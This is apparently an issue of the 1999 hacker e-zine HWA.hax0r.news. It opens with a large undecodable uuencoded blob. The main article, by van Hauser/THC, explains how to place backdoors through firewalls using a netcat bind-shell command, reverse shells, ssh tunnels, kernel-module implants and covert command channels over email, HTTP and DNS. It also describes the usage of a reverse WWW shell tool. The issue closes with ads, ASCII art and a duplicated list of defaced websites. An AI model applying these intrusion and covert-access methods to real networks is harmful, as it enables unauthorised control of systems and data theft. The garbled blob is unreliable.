M/A&Q60$%9]`==>Y`W[[J]7N3)U;[IC<9=L=CNKD?49L>VJ-)K_/8;X_HX7'T M<#_N-HG&DA62SA?PFUG\`9,OC5!A"E.?X*T4*H4^!>)9PFN>5,]02)"'`'G= M*0Y"+9Y;PT"YP:U%:D:Q-@U:)@H18#3MNRAA9[KRM[*VY M89O]]%&6)U$KA.^KO$(!DFBJ0S8F57->L$FVM,E5AJ)%EW&.9&QL^'"""73%=99>HB!#&\19BG_=Z``RBT==X[ITYH0YO[R"^&!U82/4)QYH?!' MS#R0TNW!F.4QO_'DNN.Z>"HQRK=K(IDC=OD3>S)$]KU`4F//%$XHE"@E#1_[ M_5S.VJ,5`S@,-LO`;5L//DRUVK-6/IW4Z;R^KT=.F+K[2S1$2OP-Q6AD:^P&L^_K]2> M7`WTH0SY[4;IW$7L.Y]PQ(,P0UX@$CKAC9;#M:<@BK-H*I.6\[GE5.*[TYX@ M'0KP)2?64L/:1(EI"*1$(M=!4/0[D1D=P3#D0+A"[Z6%/C7X-PV;J?19\;EM M#]PB;57\-XP]5;ZE\+[/M2^2(U=XQY3\!ZA__5>K)%2593>4\=P$K2V\;P!Q M13/"N41X94&(\GDHK53Z6*/#B=!Z&OTV#?/J@7B(I?1M./2@',IQ7I\-NP&A MD]A.+Z?M#N#8?M0?=_1F'7%/\56WQ$ MC(IC$V?@`(A>[NW]Z,GAN-E"+S_#X/<#)N!+A21 M[53XQO1)3Y97% M%HY\6J7KWLC2HHH']F8FXC(ZBSZ:1QMA9!FAN$.[\K_%]L-1X:OD(##; MW+\EZKX@P?;%[K!]A9%OV!_G6.87!7K7?(^A(:T.'^M!@_B>M\DS4$6K5D3+YP,$7SJBX@-N4KHC@D67RL5%9^@NS8,%K_N4Y7#=LH15%NO! MZ[I21"K\MMFM$=HG;U3K>2X"]NT.H&SB^O?E);VK+`QZP_L1EG^^I)_6P^0\ MU%.,`^5$0YMYCP,ZU,)'V4$J-#V@BIL(-W_,?7SC:+#2RT#:%!#866YR!N[@ MLQ)J+P/E!?8]QY3?2Z3:4W;VL?=@S$@[$T:ZE2FVV,6A'6W`W/5BD[2L\6N` MO1<1;E"GK));2-=9"@V2 MSN:1B(V[H"*&#CB=Z-.NM".,4SRGK256\''=UF':=5]@#T!TQJ-S0;TA9@7? MT`Y'3H,#1^G-Y1[X]9+10;7Y;Y?WY2&B2JR#I%;Q7;U18H4?G4V7VQ>SK^^^ MNJT=R9_W=2[]R:>_!'2A]QX'^\4WNX,;5.7_S39OL=H-O*W=SW6^1I;W2"HO MDO;&N;F2;1>T4NAF_PO5Z@#Q5V7>_KE-5ZI"P'4"]0?784)MPJ0>\'VB>I_< M[FA;0J^+%O4BDYT7#%,Y5_;B(Q=J^Q7#[EN*SYM+>?[]!U!+`P04````"``A M?$4B.1&0DW`'``!6$@``!``0`'-U+F-56`P`WJ/X,H[\^#+\`0``A5AM;]LV M$/Y<_XJKBS:2X[<`PX`E\S`C29L,61SD9<.0!)XB4;86B=1(RJY7Y+_OCJ0L MR=8P(VVLX]W#X[T\1^5#PL.TB!AT0\'C9#%<=CL?2MF/2D>)&"Y_JHD63(M< M-V5JHT9ZDS/5%.?K:,=6YDU!P1/<8@=,RX0OFE!=W$&SC)SK?(A8G'`&][>S M7Z;7\[/+6^B.EB)CHT(Q.1IJ)K,1Z24Q6-7(NYC^=CZ_^^/N:O9E?N'#IT]M M*W[S1*E8&!]8JAB,>O"^`0*]$>V`,.!$=P^GI^=W=YT/!6^3,AXE\8[)Y^GE MUYBE&^F]Q=W\XMZ M)@.]M!FQ\!T$OE\RH(B#%O#"0DP`X(Y<8&H2!2IG81(G+!J""95+VMGYY^G# MU?W\X>X^T:2#H!H7 M-85/]=/UX5B*`4K'=-*5;46,AHB.-QB0V//'1');/46R8K9P@N%E`RS6MH8 M"/15;N#F=_(.QI:>J+2W6-2/@LI>O5(E-;_;NSQ=``U+1@ M`EM:[-XXW&/H(BD!.>8U="=MVRWD M<\Z"L6%LJ>@'>TSO)_`V.X4&Z(Q*Q'.ESYT[S$)?WY4,!A0D1^8,&=" M-BAM^(1%UGEG?*RSHCD9C>#&*#W@1M83YW39<`7S-03BV.,/Y:7+32<*$2-"REP!N"#X;9`$QG1 M/NC]4X?^`0SZ,$CQW\"R5O.3!:\6WLZEDMK,DS,/R9:XA\AG`#>*FN4>Y"=62"EWC;]\!9034 M1C,(%`EJ*Z!%#?6E52"3X"5ERH'D+5Z4'T4S$WMJD#EE13L:IR9W%^=75W5E MZDHKI#L.T^'(*&)L<&JO%23:@M#'%EW+CN5T-8/:Z)3#KVYB#7-&>$U:[POS]3P4^886/E]>G4,/4T)#ID(D+ZTR M$FK$4KO::?(+[DCG?1P_FZ7ZU-XZTYBZ5HKB]1+QP/,H0):7\=N<+A+@V7@2 M,-)?>!RG6:Z.D8#*:T;?AKWG(VGZR'K(GN>SSTVF5MC*X1(,/NI\Z[P+\>X* MXV-BR1>\H;ZB&U:&5Q$CK<*.1KC[28MJ;%5W#GK4III:U;WSMRIGI&R_Y@=M M/BJ'YO+&SE'6*[OWJIA949.[?+AM\\%58#W4?DX&`SQ=\M& MH>]'PZ/OJ]:RK3'V3UKV(%:P&SAO2,TIT/410_VCZ1UZHWR/]1EFN4G^ZM$N M/^-V@ZZ_D]B6>-J5PT-K5C7NWDX6JM:`M=T.#Y]/_MMFO_O(%`ZAW),Z8^UN M&&OL#?#*;;;7"UK?'?35G#<>X2B.!+(<\1K&5FF3@`82OK'E:QH0G@TGWOZ^ M,%V[1>$ERI[1]?H$=N]2E>4IDH"9T::;J?JW]RW<`ID7[W'F783:OWHMQ5N= M#?ICXV;Z[#9W9#*)1LN@.#$J/_&/ZMC581F&?NUT MKO+B,!6*;>%(2`5@#WG&4H:O0CCW.-U3R]?*6(J,YMCK>^NU([D)56*@/?J5 M;SS/TJ$/]CW74\D_3,1>]?<3__`[OU_[>PH^=$?*#1#),K%BGH,V(G?$;L)W M;]UX2#->_@502P,$%`````@`.WQ%(GX#O_0T"0``3Q<```@`$`!S>7-T96TN M:%58#`#MH_@RPOSX,OP!``"-6']OVD@3_OO-IYCVI`(5$$B::_/F>I)#(/&5 M`#+0-M(K<<9>8%7C15X[*=)]^/>9M<$&`KVV4'8\OW=VYEF?OR>]UK%8UGRQ M$J$OPIA\,9.AC*4*-(7-Q+444GHNVR@2G;HU<]8VV@A MM_H)/V1G":Q(!F3&_KG\'&I?#E;LQ[0H%U$%"\$ MQ2)::E(SL[COC>E>A")R`QHDTT!ZU)6>"+4@%Z:9@E!]FAH]+'',[1L2$L\C M>A:1QIH0,YPHNS'[&9%:,5>%U;CAF@(WSGE?CS8/RB<9&N,+M4(`"^A$2"\R M"&@J*-%BE@155@%F^F:/'OKC$5F])_IF.8[5&SW=@#E>*#P5SR)5)9>K0$(S MPHC<,%XC(ZSAL>VT'B!BW=I=>_3$(73L4:\]'%*G[Y!%`\L9V:UQUW)H,'8& M_6&[3C04[)9@!2D(^PS.7/%33 MKW?*I#10X=P$">8\C3J:1@(I$C0(7$]0 MC88):[B\;%3I5NF8"_71HL9%L]FL-2\;'ZLT'EK(Q?OSL[/S]ZPF2'S!1^D\ M7J^$KB^P63,.WW@XDX'(N'^3&>\?S*QC-ZXO_F3R#,>.AB-K-'FT6DY_.+EU M^E_:O;/?3#GCT<0>WG:_[*Q;#\[.^L[>77?L3G^'T.WM*G@]EM@0-]`ZI&'0_>W4<\V,IW'$528'B.R-36:'QOXDVEB;GJ3`^?^LD?^NX9SC-!YX9&CQ[&)R/OQ\XAZCNXF#U"V;7=)B!'G<[,K2)BF,,%@L;]/OK:=H=WOG7D+-Z+WDVH[SBE1.I8NM%+R^4V$IYGE/4QZ-;XC& M^+T4RZ7"X$1D&D@#PPH`"#NF8QF:L49+%V,46"-P5V;$0<+CRVA9<&W*Y&)[']F/?>3(\^9Y"MXK69D\IJ[G\(0.: M<)YN.#;J\)'F9^G6LI.+J+!OQ4$IHBA41D^62T,X$S^!JD(HC5/"S7XI%N/8 MM>X'Q>)'2Q,CHV0UP^U!OU*\8U"HXK!-OD5TQJ%9[68B0M22:/3N?RO#<\QAW MSO$?`]H-=)W+9^8`X'=#+3>`FM&GJ@(`!JPD#0$G1&\PY93Q5J22^6(362!_ M"+*'`Q3XB&,GVR#?G1)G^)UVQ"HC1IA,8N6I<`:,JAFVRQF#9P/%&5$:N^9H MI39\6JY031&]J`@:98R`W1\6#?QPW^`2YR-F0I\/H=O M30'<1DFHZ,&54Z!=U_>+==%)(FX2C-JK\"=9K414]BHD8J^>PG5LA\%^G"L$ MII,@YH[A@9NU8..T]%-7<,^8`TDWZ8_/>(ZOBZNK.O51$4@WBF$5I^E*L7IN MC?68O*$>!">&KP2\SW]S19:JIDH,J,:_EXAO`ID'[-VGVE2:O.3E^^=G:EY\ MHI>%1"'BD"-WHT]-(>J M4IC\&$BMT=.@/;GK/UIVC[>EN>T[QWDR(YS7O:8F]31PPQ\%:>!G"]`*4N4] M3<1$N)G)\+)R8+P@SE^`""7\Y9BSU?_B4A&:I$[@XK9:%+7<.];@X;031N:( M$_]"?!7QR,B6;Z36*[[S9>JR'&WUF<;Q+_55"G)6MS=^/"WG!F&R/)0;/%B_ MDELMW'TY3">G>UH.TRH*]N6Z_6]MY[1ZU=Y24+O("_#@=5J MGY8K[L=6SIS`TW*F@^S+?;^S[^U?./K3EW-YX*D1G'3[+:O["X<+XOPN()4D M%!(:/[_'4LL]=55N&NC+R"SZ+WI-C6QN*]'I,%V?JPJ3,0FY7YG70O$- MOPHR@R94<65]]HPRSF*80!D(TEP9W-->_,C*5DR:_ZQ$\T24Q\A?E4 ME$7'E1[&++"`B]&=ZATH+7]2L]&XK%_4FM?7%Z31#LWKK_I5_:+>I)6+GG_5 MP-0-,>Z:5U>_U_#U*04+&P1A($:I4=J.JM)UR2`)DT>-&3TP,W.;R5CMY0\Q M!T+K]&T?O)7+%08C#SNP,F+F`10H!"!*NO`ZDV?)W\9**7TWQG!D\RYKH=#1 M?06_.;<\_E6T9(4F[!0U[U5'VNPV&U`Q%5$SH6'>75<*-YS)(,76`Z<_ZG,1 M,2#=="T\+5O17%>(OQE*ITWM\'FYD@/M_*8P;L8-LU2`:>:2V-Z*VB/4HF\OVJ^E+%`N852F@/[5ZEK".8.R5-];?*4 MSQIJ]ZQ;6(5?!;MO`<"E0<]O<^V3\@A3N<)#.L8/2I?;'I^^=8*8ST]]M<00 MSH5WZ>4[\U^5[F2$&H6C>PYFVE[3=*!E7W3/7?[>1/Q_4$L!`A4#%`````@` M+R)$(G7:3PX=#```.3````@`#````````0``0*2!`````&-O;F9I9RYH55@( M`).C^#*Z#/YN^Z.!```M`D```<`#``````` M`0``0*2!4PP``&5R3X("``#.!```"@`,```````!``!`I($6$0``9F%K97-U+F1O8U58"`!/ MJ?@R3ZGX,E!+`0(5`Q0````(`.-[12*[JQGC(@@``$X6```,``P```````$` M`$"D@=`3``!L:6)G971T97AT+FA56`@`NZ/X,AG\^#)02P$"%0,4````"`#H M>T4BNZL9XR((``!.%@``"0`,```````!``!`I($L'```;&EB:6YT;"YH55@( M`,RC^#(C_/@R4$L!`A4#%`````@`(7Q%(CD1D)-P!P``5A(```0`#``````` M`0``0*2!A20``'-U+F-56`@`WJ/X,H[\^#)02P$"%0,4````"``[?$4B?@._ M]#0)``!/%P``"``,```````!``!`I($G+```1023) through to allow the (non-passive) ftp protocol to work. "netcat -p 20 target port-of-bindshell" is the fastest solution for this one. Stateful Filters: Here a hacker must use programs which initiates the connection from the secure network to his external 0wned server. There are many out there which could be used: active: tunnel from Phrack 52. ssh with the -R option (much better than tunnel ... it's a legtimitate program on a computer and it encrypts the datastream). passive: netcat compiled with the execute option and run with a time option to connect to the hacker machine (ftp.avian.org). reverse_shell from the thc-uht1.tgz package (see above) does the same. Proxies / Circuit Level Gateways: If socks is used on the firewall, someone can use all those stuff for the stateful filter and "socksify" them. (www.socks.nec.com) For more advanced tools you'd should take a look at the application gateway section. Application Gateways: Now we get down to the interesting stuff. These beasts can be intelligent so some brain is needed. active: (re-)placing a cgi-script on the webserver of the company, which allows remote access. This is unlikely because it's rare that the webserver is in the network, not monitored/ checked/audited and accessible from the internet. I hope nobody needs an example on such a thing ;-) (re-placing) a service/binary on the firewall. This is dangerous because those are audited regulary and sometimes even sniffed on permanent ... Loading a loadable module into the firewall kernel wich hides itself and gives access to it's master. The best solution for an active backdoor but still dangerous. passive: E@mail - an email account/mailer/reader is configured in a way to extract hidden commands in an email (X-Headers with weird stuff) and send them back with output if wanted/needed. WWW - this is hard stuff. A daemon on an internal machine does http requests to the internet, but the requests are in real the answers of commands which were issued by a rogue www server in a http reply. This nice and easy beast is presented below (->Backdoor Example: The Reverse WWW Shell) DNS - same concept as above but with dns queries and replies. Disadvantage is that it can not carry much data. (http://www.icon.co.za/~wosp/wosp.dns-tunnel.tar.gz, this example needs still much coding to be any effective) ----[ Backdoor Example: The Reverse WWW Shell This backdoor should work through any firewall which has got the security policy to allow users to surf the WWW (World Wide Waste) for information for the sake and profit of the company. For a better understanding take a look at the following picture and try to remember it onwards in the text: +--------+ +------------+ +-------------+ |internal|--------------------| FIREWALL |--------------|server owned | | host | internal network +------------+ internet |by the hacker| +--------+ +-------------+ SLAVE MASTER Well, a program is run on the internal host, which spawns a child every day at a special time. For the firewall, this child acts like a user, using his netscape client to surf on the internet. In reality, this child executes a local shell and connects to the www server owned by the hacker on the internet via a legitimate looking http request and sends it ready signal. The legitimate looking answer of the www server owned by the hacker are in reality the commands the child will execute on it's machine it the local shell. All traffic will be converted (I'll not call this "encrypted", I'm not Micro$oft) in a Base64 like structure and given as a value for a cgi-string to prevent caching. Example of a connection: Slave GET /cgi-bin/order?M5mAejTgZdgYOdgIO0BqFfVYTgjFLdgxEdb1He7krj HTTP/1.0 Master replies with g5mAlfbknz The GET of the internal host (SLAVE) is just the command prompt of the shell, the answer is an encoded "ls" command from the hacker on the external server (MASTER). Some gimmicks: The SLAVE tries to connect daily at a specified time to the MASTER if wanted; the child is spawned because if the shell hangs for whatever reason you can check & fix the next day; if an administrator sees connects to the hacker's server and connects to it himself he will just see a broken webserver because there's a Token (Password) in the encoded cgi GET request; WWW Proxies (f.e. squid) are supported; program masks it's name in the process listing ... Best of all: master & slave program are just one 260-lines perl file ... Usage is simple: edit rwwwshell.pl for the correct values, execute "rwwwshell.pl slave" on the SLAVE, and just run "rwwwshell.pl" on the MASTER just before it's time that the slave tries to connect. Well, why coding it in perl? a) it was very fast to code, b) it's highly portable and c) I like it. If you want to use it on a system which hasn't got perl installed, search for a similar machine with perl install, get the a3 compiler from the perl CPAN archives and compile it to a binary. Transfer this to your target machine and run that one. The code for this nice and easy tool is appended in the section THE CODE after my last words. If you've got updates/ideas/critics for it drop me an email. If you think this text or program is lame, write me at root@localhost. Check out http://r3wt.base.org for updates. ----[ The Source Grab it here ... rwwwshell v1.6 ----[ Security Now it's an interesting question how to secure a firewall to deny/detect this. It should be clear that you need a tight application gateway firewall with a strict policy. email should be put on a centralized mail server, and DNS resolving only done on the WWW/FTP proxies and access to WWW only prior proxy authentication. However, this is not enough. An attacker can tamper the mailreader to execute the commands extracted from the crypted X-Headers or implement the http authentication into the reverse www-shell (it's simple). Also checking the DNS and WWW logs/caches regulary with good tools can be defeated by switching the external servers every 3-20 calls or use aliases. A secure solution would be to set up a second network which is connected to the internet, and the real one kept seperated - but tell this the employees ... A good firewall is a big improvement, and also an Intrusion Detection Systems can help. But nothing can stop a dedicated attacker. ----[ Last Words Have fun hacking/securing the systems ... Greets to all guys who like + know me ;-) and especially to those good chummers I've got, you know who you are. Ciao... van Hauser / [THC] - The Hacker's Choice For further interesting discussions you can email me at vh@reptile.rug.ac.be with my public pgp key blow: Type Bits/KeyID Date User ID pub 2048/CDD6A571 1998/04/27 van Hauser / THC -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.3i mQENAzVE0A4AAAEIAOzKPhKBDFDyeTvMKQ1xx6781tEdIYgrkrsUEL6VoJ8H8CIU SeXDuCVu3JlMKITD6nPMFJ/DT0iKHgnHUZGdCQEk/b1YHUYOcig1DPGsg3WeTX7L XL1M4DwqDvPz5QUQ+U+VHuNOUzgxfcjhHsjJj2qorVZ/T5x4k3U960CMJ11eOVNC meD/+c6a2FfLZJG0sJ/kIZ9HUkY/dvXDInOJaalQc1mYjkvfcPsSzas4ddiXiDyc QcKX+HAXIdmT7bjq5+JS6yspnBvIZC55tB7ci2axTjwpkdzJBZIkCoBlWsDXNwyq s70Lo3H9dcaNt4ubz5OMVIvJHFMCEtIGS83WpXEABRG0J3ZhbiBIYXVzZXIgLyBU SEMgPHZoQHJlcHRpbGUucnVnLmFjLmJlPokAlQMFEDVE0D7Kb9wCOxiMfQEBvpAD /3UCDgJs1CNg/zpLhRuUBlYsZ1kimb9cbB/ufL1I4lYM5WMyw+YfGN0p02oY4pVn CQN6ca5OsqeXHWfn7LxBT3lXEPCckd+vb9LPPCzuDPS/zYNOkUXgUQdPo69B04dl C9C1YXcZjplYso2q3NYnuc0lu7WVD0qT52snNUDkd19ciQEVAwUQNUTQDhLSBkvN 1qVxAQGRTwgA05OmurXHVByFcvDaBRMhX6pKbTiVKh8HdJa8IdvuqHOcYFZ2L+xZ PAQy2WCqeakvss9Xn9I28/PQZ+6TmqWUmG0qgxe5MwkaXWxszKwRsQ8hH+bcppsZ 2/Q3BxSfPege4PPwFWsajnymsnmhdVvvrt69grzJDm+iMK0WR33+RvtgjUj+i22X lpt5hLHufDatQzukMu4R84M1tbGnUCNF0wICrU4U503yCA4DT/1eMoDXI0BQXmM/ Ygk9bO2Icy+lw1WPodrWmg4TJhdIgxuYlNLIu6TyqDYxjA/c525cBbdqwoE+YvUI o7CN/bJN0bKg1Y/BMTHEK3mpRLLWxVMRYw== =MdzX -----END PGP PUBLIC KEY BLOCK----- ----[ THE END @HWA -=----------=- -=----------=- -=----------=- -=----------=- O 0 o O O O 0 -=----------=- -=----------=- -=----------=- -=----------=- -=----------=- END of main news articles content... read on for ads, humour, hacked websites etc -=----------=- -=----------=- -=----------=- -=----------=- -=----------=- HWA.hax0r.news AD.S ADVERTI$ING. The HWA black market ADVERTISEMENT$. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ***************************************************************************** * * * ATTRITION.ORG http://www.attrition.org * * ATTRITION.ORG Advisory Archive, Hacked Page Mirror * * ATTRITION.ORG DoS Database, Crypto Archive * * ATTRITION.ORG Sarcasm, Rudeness, and More. * * * ***************************************************************************** www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.freekevi n.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnick.co m www.2600.com ########################################ww.2600.com www.freeke vin.com www.kev# Support 2600.com and the Free Kevin #.com www.kevinmitnick. com www.2600.co# defense fund site, visit it now! . # www.2600.com www.free kevin.com www.k# FREE KEVIN! #in.com www.kevinmitnic k.com www.2600.########################################om www.2600.com www.fre ekevin.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnic k.com www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.fre www.2600.com One of our sponsers, visit them now www.csoft.net * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * WWW.BIZTECHTV.COM/PARSE WEDNESDAYS AT 4:30PM EST, HACK/PHREAK CALL-IN WEBTV * * JOIN #PARSE FOR LIVE PARTICIPATION IN SHOW CHAT OR THE WEBCHAT, AND WEBBOARD* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * WWW.2600.COM OFF THE HOOK LIVE NETCAST'S TUES SIMULCAST ON WBAI IN NYC @8PM * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * ////////////////////////////////////////////////////////////////////////////// // To place an ad in this section simply type it up and email it to // // hwa@press,usmc.net, put AD! in the subject header please. - Ed // ////////////////////////////////////////////////////////////////////////////// @HWA HA.HA Humour and puzzles ...etc ~~~~~~~~~~~~~~~~~~~~~~~~~ Don't worry. worry a *lot* Send in submissions for this section please! ............c'mon, you KNOW you wanna...yeah you do...make it fresh and new...be famous... ____ _ _ _ _ _ / ___| ___ _ __ __| (_)_ __ _ _ ___ _ _ _ __ / \ ___ ___(_|_) \___ \ / _ \ '_ \ / _` | | '_ \| | | |/ _ \| | | | '__| / _ \ / __|/ __| | | ___) | __/ | | | (_| | | | | | |_| | (_) | |_| | | / ___ \\__ \ (__| | | |____/ \___|_| |_|\__,_|_|_| |_|\__, |\___/ \__,_|_| /_/ \_\___/\___|_|_| |___/ / \ _ __| |_ / _ \ | '__| __| / ___ \| | | |_ /_/ \_\_| \__| TOO, for inclusion in future issues Do the HWA logo etc and we'll showcase it here to show off your talents...remember the 80's? dig out those ascii editors and do yer best... _| _|_|_| _|_| _|_|_|_| _| _| _| _| _| _| _| _| _| _| _|_|_| _|_| _|_| _| _|_| _| _|_| _| _|_| _|_| _|_| _|_|_|_| _| _|_| _| _| _| _| _| _|_| _| _| _| _| _| _| _| _|_| _|_| _|_| _| . . / `. .' \ .---. < > < > .---. | \ \ - ~ ~ - / / | ~-..-~ ~-..-~ \~~~\.' `./~~~/ .-~~^-. \__/ \__/ .' O \ / / \ \ (_____, `._.' | } \/~~~/ `----. / } | / \__/ `-. | / | / `. ,~~| ~-.__| /_ - ~ ^| /- _ `..-' f: f: | / | / ~-. `-. _||_||_ |_____| |_____| ~ - . _ _ _ _ _> __ __ / \./ \/\_ __{^\_ _}_ ) }/^\ / /\_/^\._}_/ // / ( (__{(@)}\__}.//_/__,____,_______,________.________,_____.___.___,______ \__/{/(_)\_} )\\ \\----,----,-----.---,-----.----,------,-----,-----.--- ( (__)_)_/ )\ \> \__/ \__/\/\/ \__,--' \__/ \__/ \__/ \__/ \__/ \__/ \__/ (oo) (o-) (@@) (xx) (--) ( ) (OO) //||\\ //||\\ //||\\ //||\\ //||\\ //||\\ //||\\ bug bug bug/w dead bug blind bug after winking hangover bug sleeping bug seeing a female bug . .:. .:::. .:::::. ***.:::::::.*** *******.:::::::::.******* ********.:::::::::::.******** ********.:::::::::::::.******** *******.::::::'***`::::.******* ******.::::'*********`::.****** ****.:::'*************`:.**** *.::'*****************`.* .:' *************** . . _________________________ /| /| | | ||__|| | HAX0R FOR HIRE | / O O\__ | / \ WILL HACK FOR FEWD! | / \ \ | / _ \ \ --------------------- / |\____\ \ || / | | | |\____/ || / \|_|_|/ | __|| / / \ |____| || / | | /| | --| | | |// |____ --| * _ | |_|_|_| | \-/ *-- _--\ _ \ // | / _ \\ _ // | / * / \_ /- | - | | * ___ c_c_c_C/ \C_c_c_c____________ _________ __________________ _/ || ~-_ ,/ // /~- / ~-_ ________---------------// -----------------------------------\-------------------____________ __// O-------------- ~~^ | | ~| }======{--------\____________________|______________________________ | | \===== / /~~~\ \ \ | ________________________|-~ \----| \___/ ||--------------------'----------| \____/ // `______'' `_______' (Ascii art from V0iD magazine #7) - @HWA SITE.1 http://blacksun.box.sk This is here again this week because it really deserves a good look, there are some great tutorials on this site, check it out! You can Send in submissions for this section too if you've found (or RUN) a cool site... @HWA H.W Hacked websites ~~~~~~~~~~~~~~~~ Note: The hacked site reports stay, especially with some cool hits by groups like *H.A.R.P, go get em boyz racism is a mugs game! - Ed * Hackers Against Racist Propaganda (See issue #7) Haven't heard from Catharsys in a while for those following their saga visit http://frey.rapidnet.com/~ptah/ for 'the story so far'... Hacker groups breakdown is available at Attrition.org ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ check out http://www.attrition.org/mirror/attrition/groups.html to see who you are up against. You can often gather intel from IRC as many of these groups maintain a presence by having a channel with their group name as the channel name, others aren't so obvious but do exist. Greater Albany Public School District 8J (rh.8j.net) Lake Abitibi Model Forest (www.lamf.net) Golfing Spain (www.golfingspain.com) Rosie (rosie.ourfamily.com) Top 100 (www.top100.com) East-West Corridor Communications (www.ewcc.com) Mildew Removal Specialists (www.mildew.net) K2 Mall (www.k2mall.com) Queen City Corvette Club (www.queencitycorvette.com) Rancho Mirage Homes (www.ranchomiragehomes.com) Training Direct (www.training-direct.com) Shuz (www.shuz.com) Hyundai (www.hec.co.kr) Media 2000 (www.media2000.se) Petty Brook Farm (www.pettybrookfarm.com) Bottle Cap Site (www.bottlecapsite.com) [99.09.27] NT [the craft] (dcmdw) Defense Logistics Agency (internet.dcmdw.dla.mil) [99.09.27] NT [fEAR-mE] ASCD Org (chatserver.ascd.org [99.09.27] NT [fEAR-mE] Foxy Net (www.foxynet.com) [99.09.27] NT [139_r00ted] #3 Hoffman Bikes (www.hoffmanbikes.com) [99.09.27] Li [LevelSeven] Journy-X (www.journyx.com) [99.09.28] NT [ytcracker] Altamira International Bank (www.altabank.com) [99.09.28] NT [ytcracker] Fun Caribbean (www.funcaribbean.com) [99.09.28] NT [Narcissus] M K Mount Gay (www.mountgay.com) [99.09.28] NT [HIT2000] Le Monde Pub (www.mondepub.fr) [99.09.28] NT [induce] Trkiye'nin bir numarali televizyon kanali (www.atv.com.tr) [99.09.28] NT [fEAR-mE] BT USA (www.btusa.com) [99.09.28] NT [ ] #4 Hoffman Bikes (www.hoffmanbikes.com) [99.09.29] Li [LevelSeven] PNK (www.pnk.com) [99.09.29] Li [Pakistan HC] DC ArtBeat (dc-artbeat.com) [99.09.29] HP [ ] Geofluids Engineering Lab, Seoul National University (petro.snu.ac.kr) [99.09.29] BI [Zo0mer] List Soft (www.listsoft.com) [99.09.29] So [wrLiner] M Ricor (www.art.ricor.ru) [99.09.29] Bf [D.A.M.] Lost Search (www.lostsearch.com) [99.09.30] BI [Mister-X] DeltaNet (www2.deltanet.com) [99.09.30] NT [GOD] Crockett County School District (www.technology.crockett.k12.tn.us) [99.09.30] HP [hV2k] #2 Geofluids Engineering Lab, Seoul National University (petro.snu.ac.kr) [99.09.30] So [mistuh clean] Web Yes Singapore (singapore.webyes.com) [99.09.30] Li [ ] Suid Root (www.suidroot.org) [99.09.30] NT [139_r00ted] PanAmSat Corporation (www.panamsat.com) [99.10.02] So [ ] Infin (AU) (www.infin.com.au) [99.10.02] NT [x-empt] #2 Kinky Singles (www.kinkysingles.com) [99.10.02] So [ ] Macsoc (AU) (www.macsoc.com.au) [99.10.02] NT [Pakistan HC] Alarm Link (www.alarmlink.com) [99.10.02] Li [HIT2000] Lucent (FR) (www.lucent.fr) [99.10.02] NT [Narcissus] K Auraweb (www.auraweb.com) [99.10.02] So [TREATY] NKFU Edu (TW) (ccms.nkfu.edu.tw) http://www.attrition.org/mirror/attrition/ [99.10.02] NT [139_r00ted] Medical U.Penn (ebdc.med.upenn.edu) [99.10.02] NT [GOD] Luigi Foroni (www.luigiforoni.com) [99.10.02] NT [GOD] The Monophonics (www.themonophonics.org) [99.10.02] NT [bl0w team] Bndes Gov (BR) (www.bndes.gov.br) [99.10.02] So [GOD] M Cicese (MX) (www.cicese.mx) [99.10.02] NT [xclamation] Deliocesar (BR) (www.deliocesar.jor.br) [99.10.02] NT [139_r00ted] Medical U.Penn (ebdc.med.upenn.edu) [99.10.02] NT [GOD] Luigi Foroni (www.luigiforoni.com) [99.10.02] NT [GOD] The Monophonics (www.themonophonics.org) [99.10.02] So [ ] Infin (AU) (www.infin.com.au) [99.10.02] NT [x-empt] #2 Kinky Singles (www.kinkysingles.com) [99.10.02] So [ ] Macsoc (AU) (www.macsoc.com.au) [99.10.02] NT [Pakistan HC] Alarm Link (www.alarmlink.com) [99.10.02] Li [HIT2000] Lucent (FR) (www.lucent.fr) [99.10.02] NT [Narcissus] K Auraweb (www.auraweb.com) [99.10.02] So [TREATY] NKFU Edu (TW) (ccms.nkfu.edu.tw) Several things: 1. Many FreeBSD hosts have been hit in the last 12 hours, by different groups. This suggests a new bug is being exploited. 2. The defacement of 'Anime Otaku' seems to be the first domain that shows time and energy for the hack. The defacement consists of an animated shockwave movie. [99.10.03] Bf [DJ synisteR] Anime Otaku (www.animeotaku.com) [99.10.03] NT [Pakistan HC] (nextstop) Truckstop (nextstop.truckstop.com) [99.10.03] NT [Pakistan HC] (services) Truckstop (services.truckstop.com) [99.10.03] NT [Pakistan HC] (trial) Truckstop (trial.truckstop.com) [99.10.03] Bf [TREATY] Atoz (HK) (www.atoz.com.hk) [99.10.03] NT [DHC] Daisey (www.daisey.com) [99.10.03] Bf [TREATY] Golden Image (www.golden-image.com) [99.10.03] Bf [TREATY] Sky Pit (www.skypit.com) [99.10.03] Bf [Pakistan HC] Tanner McCarron (www.tannerm.com) [99.10.03] NT [Narr0w] The Psychic Connection (www.thepsychicconnection.com) [99.10.03] Bf [TREATY] TNQ (TO) (www.tnq.to) [99.10.03] NT [Pakistan HC] Truckstop (www.truckstop.com) and more sites at the attrition cracked web sites mirror: http://www.attrition.org/mirror/attrition/index.html ------------------------------------------------------------------------- A.0 APPENDICES _________________________________________________________________________ A.1 PHACVW, sekurity, security, cyberwar links ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ The links are no longer maintained in this file, there is now a links section on the http://welcome.to/HWA.hax0r.news/ url so check there for current links etc. The hack FAQ (The #hack/alt.2600 faq) http://www-personal.engin.umich.edu/~jgotts/underground/hack-faq.html Hacker's Jargon File (The quote file) http://www.lysator.liu.se/hackdict/split2/main_index.html New Hacker's Jargon File. http://www.tuxedo.org/~esr/jargon/ HWA.hax0r.news Mirror Sites around the world: 